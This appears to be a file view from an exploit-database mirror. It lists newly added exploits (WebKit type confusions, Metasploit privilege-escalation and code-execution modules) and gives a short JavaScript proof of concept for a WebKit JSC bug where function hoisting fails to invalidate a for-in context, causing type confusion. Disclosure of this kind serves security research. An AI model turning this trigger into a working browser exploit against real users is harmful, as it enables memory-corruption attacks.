62445895aa
8 changes to exploits/shellcodes WebKit JSC JIT - 'JSPropertyNameEnumerator' Type Confusion WebKit JIT - 'ByteCodeParser::handleIntrinsicCall' Type Confusion WebKit JSC - BytecodeGenerator::hoistSloppyModeFunctionIfNecessary Does not Invalidate the 'ForInContext' Object Unitrends Enterprise Backup - bpserverd Privilege Escalation (Metasploit) Linux - Nested User Namespace idmap Limit Local Privilege Escalation (Metasploit) Mac OS X - libxpc MITM Privilege Escalation (Metasploit) PHP imap_open - Remote Code Execution (Metasploit) TeamCity Agent - XML-RPC Command Execution (Metasploit)
22 lines
No EOL
621 B
JavaScript
22 lines
No EOL
621 B
JavaScript
/*
|
|
This is simillar to issue 1263 . When hoisting a function onto the outer scope, if it overwrites the iteration variable for a for-in loop it should invalidate the corresponding ForInContext object, but it doesn't. As a result, an arbitrary object can be passed as the property variable to the op_get_direct_pname handler which uses the property variable directly as a string object without any check.
|
|
|
|
PoC:
|
|
*/
|
|
|
|
function trigger() {
|
|
let o = {a: 1};
|
|
for (var k in o) {
|
|
{
|
|
k = 0x1234;
|
|
|
|
function k() {
|
|
|
|
}
|
|
}
|
|
|
|
o[k];
|
|
}
|
|
}
|
|
|
|
trigger(); |